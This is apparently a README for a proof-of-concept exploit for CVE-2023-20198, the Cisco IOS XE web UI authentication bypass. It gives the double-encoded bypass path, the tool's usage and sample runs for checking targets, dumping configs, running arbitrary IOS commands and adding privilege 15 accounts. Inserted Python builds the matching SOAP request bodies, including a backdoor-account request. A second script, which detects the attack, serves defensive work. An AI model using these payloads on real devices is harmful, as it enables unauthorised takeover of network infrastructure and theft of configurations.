## https://sploitus.com/exploit?id=943D5962-14B3-5410-8106-BD5EEA778153
# CVE-2023-20198
Exploit PoC for CVE-2023-20198
## Description
CVE-2023-20198 is an authentication bypass in the Cisco IOS XE web UI: improper path validation lets a request slip past the Nginx front end's filtering and reach the `webui_wsma_http` endpoint without authenticating. The request path is double URL-encoded (`/%2577eb%2575i_%2577sma_Http`, as seen in the example output below): Nginx decodes it once to `%77eb%75i_%77sma_Http`, which does not match its filter, and the backend decodes it a second time and routes it to the WSMA endpoint.<br>
Once at the endpoint, an attacker can execute arbitrary Cisco IOS commands or push configuration changes at privilege level 15.<br>
Cisco's investigation into active exploitation of the then-undisclosed vulnerability found that threat actors first used CVE-2023-20198 to add a local user at privilege level 15, then exploited CVE-2023-20273 to escalate to `root` on the underlying Linux OS and install an implant.<br>
This PoC exploits CVE-2023-20198 to reach two different XML SOAP (WSMA) request types:<br>
The vulnerability check, config dump and command execution options (`-c`, `-g`, `-e`) all target the `cisco:wsma-exec` SOAP endpoint, placing the IOS command in the `execCLI` element.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change that creates the privilege 15 account. The same endpoint could be abused to make any other configuration change, but that's outside the scope of this PoC.<br>
The `cisco:wsma-exec` technique is taken from the nuclei template.<br>
The `cisco:wsma-config` technique is taken from the horizon3ai PoC.<br>
Note: I did not conduct any of the original research or PoC development for this CVE; see the References section for credit.
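As an added illustration of the two request types described above, the following Python builds the `cisco:wsma-exec` and `cisco:wsma-config` SOAP bodies and parses an exec response. This is example code written for this page, not the PoC's own source. The README names only the endpoints and the `execCLI` element; the other element names follow Cisco's WSMA schema, the `username ... privilege 15 secret ...` form and the response layout (`execLog/dialogueLog/received/text`) are assumptions, and the sample response is constructed. It builds and parses only; nothing is sent.

```python
"""Build the WSMA SOAP requests the README describes and parse an exec response."""
import re
import uuid
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Double-URL-encoded path from the README's example output. The front end
# decodes it once to /%77eb%75i_%77sma_Http, which its filter does not
# match; the backend decodes it again and reaches webui_wsma_http.
BYPASS_PATH = "/%2577eb%2575i_%2577sma_Http"

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WSMA_EXEC = "urn:cisco:wsma-exec"
WSMA_CONFIG = "urn:cisco:wsma-config"


def _envelope(body: str) -> str:
    """Wrap a WSMA request in a minimal SOAP envelope (no SOAP header)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<SOAP:Envelope xmlns:SOAP="{SOAP_NS}"><SOAP:Body>{body}'
        "</SOAP:Body></SOAP:Envelope>"
    )


def exec_request(command: str, correlator: str = "") -> str:
    """cisco:wsma-exec request: the IOS command goes into execCLI/cmd (README -c, -g, -e)."""
    correlator = correlator or uuid.uuid4().hex[:8]
    return _envelope(
        f'<request xmlns="{WSMA_EXEC}" correlator="{correlator}">'
        f"<execCLI><cmd>{escape(command)}</cmd></execCLI></request>"
    )


def config_request(lines, correlator: str = "") -> str:
    """cisco:wsma-config request. Element names (configApply/config-data/
    cli-config-data/cmd) follow Cisco's WSMA schema; the README only names the endpoint."""
    correlator = correlator or uuid.uuid4().hex[:8]
    cmds = "".join(f"<cmd>{escape(line)}</cmd>" for line in lines)
    return _envelope(
        f'<request xmlns="{WSMA_CONFIG}" correlator="{correlator}">'
        f'<configApply details="all"><config-data><cli-config-data>{cmds}'
        "</cli-config-data></config-data></configApply></request>"
    )


def add_user_request(username: str, password: str) -> str:
    """Config change creating a privilege 15 local user (README -a).
    The exact IOS 'username' form the PoC sends is an assumption."""
    return config_request([f"username {username} privilege 15 secret {password}"])


def parse_exec_response(xml_text: str):
    """Return (success, cli_output) from a cisco:wsma-exec response.
    Assumed layout: response[@success]/execLog/dialogueLog/received/text."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return False, ""
    ns = {"w": WSMA_EXEC}
    resp = root.find(".//w:response", ns)
    if resp is None:
        return False, ""
    texts = [t.text or "" for t in resp.findall(".//w:received/w:text", ns)]
    return resp.get("success") == "1", "\n".join(texts).strip()


def ios_version(banner: str) -> str:
    """Pull the version token out of a 'show version' banner, e.g. '16.6.5'."""
    m = re.search(r"\bVersion\s+([^,\s]+)", banner)
    return m.group(1) if m else ""


# Constructed sample response (not captured from a device); the banner text
# is the one shown in the README's -c example.
SAMPLE_RESPONSE = _envelope(
    f'<response xmlns="{WSMA_EXEC}" correlator="c0ffee" success="1">'
    "<execLog><dialogueLog><sent>show version</sent><received><text>\n"
    "Cisco IOS Software [Everest], Catalyst L3 Switch Software "
    "(CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n"
    "</text></received></dialogueLog></execLog></response>"
)

if __name__ == "__main__":
    print(exec_request("show version", "c0ffee"))
    ok, out = parse_exec_response(SAMPLE_RESPONSE)
    print(ok, ios_version(out))
```

Commands are XML-escaped before being placed in `<cmd>`, so a command containing `<`, `>` or `&` cannot break out of the element; the PoC's `-e` path does no such validation, which is why the README warns about it below.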
## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```
### Vulnerability check
The `-c` option checks for CVE-2023-20198 by actually exploiting it: it sends an IOS command through `execCLI` and reports the target vulnerable if the response comes back with the IOS version banner (the `IOS Ver:` line below, which is `show version` output). This is an active check that executes a command on the device, not a passive fingerprint. With `-l`, the check runs against every IP in the file.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c
Testing for vulnerability
Target IP: 10.0.0.1
Target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable: True
IOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```
### Get Cisco Config
The `-g` option executes `sh run` to pull the running config<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g
Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```
### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Use extreme caution if you use this to make configuration changes: the command string is passed to the device with no input validation, and any change is applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'
Selected Target: 10.0.0.1
Running in Exec Mode
Executing Command: sh log
Sending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
Console logging: level debugging, 5368 messages logged, xml disabled,
filtering disabled
...
```
### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned
Selected Target: 10.0.0.1
Adding New Privilege 15 User
New User Name: shellsmoke
New User Pass: pwned
Sending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http
No reportable output from adding users
Check verbose ouput or get running config
Done.
```
### Del user
The `-d` option removes a user account from the device, using the name given with `-u` (default: `shellsmoke`).<br>
Take care that you aren't deleting a legitimate account.<br>
This option was added for cases where shell/web UI access to an exploited device cannot be obtained. It was observed that adding a privilege 15 user this way does not grant web UI access, so without `-d` the account would be left behind as an exploitation artifact on the host.<br>
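For the defensive side of the two artifacts discussed on this page (the double-encoded request path and a leftover privilege 15 account), here is an added hunting example; it is not part of the PoC. It flags request paths that only name `webui_wsma_http` after one or more rounds of percent-decoding, and lists privilege 15 users in a running config (as pulled by `-g`) that are not on an allowlist. The log lines and config are constructed samples; the common-log-format layout and the `username ... privilege N` line shape are assumptions, and the device itself does not expose such an access log, so the lines stand in for a proxy or packet capture in front of it.

```python
"""Hunt for CVE-2023-20198 artifacts: obfuscated webui_wsma_http requests and
unexpected privilege 15 users in a running config."""
import re
from urllib.parse import unquote

WSMA_ENDPOINT = "webui_wsma_http"

# Common-log-format request line: SRC ... "METHOD PATH HTTP/x.y" (assumed layout)
_REQ_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')
# IOS local user lines as stored in the running config (assumed shape)
_USER_RE = re.compile(r"^username\s+(\S+)\s+privilege\s+(\d+)\b", re.MULTILINE)


def decode_layers(path: str, max_layers: int = 4) -> list:
    """Successive URL decodings of `path`, stopping when another decode changes nothing."""
    layers = [path]
    for _ in range(max_layers):
        nxt = unquote(layers[-1])
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers


def is_obfuscated_wsma_request(path: str) -> bool:
    """True if the raw path hides the endpoint behind one or more layers of
    percent-encoding, as the README's /%2577eb%2575i_%2577sma_Http does."""
    raw, *decoded = (p.split("?", 1)[0].lower() for p in decode_layers(path))
    return WSMA_ENDPOINT not in raw and any(WSMA_ENDPOINT in d for d in decoded)


def hunt_access_log(lines) -> list:
    """Return (source, raw_path) for each request whose path is an obfuscated WSMA request."""
    hits = []
    for line in lines:
        m = _REQ_RE.match(line)
        if m and is_obfuscated_wsma_request(m["path"]):
            hits.append((m["src"], m["path"]))
    return hits


def priv_users(running_config: str, min_priv: int = 15) -> list:
    """Usernames configured at or above `min_priv`, in config order."""
    return [u for u, p in _USER_RE.findall(running_config) if int(p) >= min_priv]


def unexpected_priv15_users(running_config: str, known) -> list:
    """Privilege 15 users not in the allowlist `known` (the artifact -a leaves behind)."""
    return sorted(set(priv_users(running_config)) - set(known))


# Constructed samples (not real captures).
SAMPLE_ACCESS_LOG = [
    '203.0.113.9 - - [17/Oct/2023:01:02:03 +0000] "GET /webui/ HTTP/1.1" 200 1832',
    '203.0.113.9 - - [17/Oct/2023:01:02:04 +0000] "POST /webui_wsma_http HTTP/1.1" 403 153',
    '203.0.113.9 - - [17/Oct/2023:01:02:05 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 1532',
    '198.51.100.4 - - [17/Oct/2023:01:05:00 +0000] "POST /%77eb%75i_wsma_http HTTP/1.1" 403 153',
]

SAMPLE_RUNNING_CONFIG = """\
version 16.6
hostname edge-sw1
username admin privilege 15 secret 9 $9$CONSTRUCTED
username netops privilege 1 password 7 0822455D0A16
username shellsmoke privilege 15 secret 5 $1$CONSTRUCTED
ip http server
"""

if __name__ == "__main__":
    for src, path in hunt_access_log(SAMPLE_ACCESS_LOG):
        print(f"obfuscated WSMA request from {src}: {path}")
    for user in unexpected_priv15_users(SAMPLE_RUNNING_CONFIG, {"admin"}):
        print(f"unexpected privilege 15 user: {user}")
```

The path check deliberately flags a single layer of encoding as well as the double encoding the PoC uses: a direct `/webui_wsma_http` request is what the front end is meant to filter, so any percent-encoded spelling of that name is worth a look regardless of the response code.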
## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>
## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling
## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil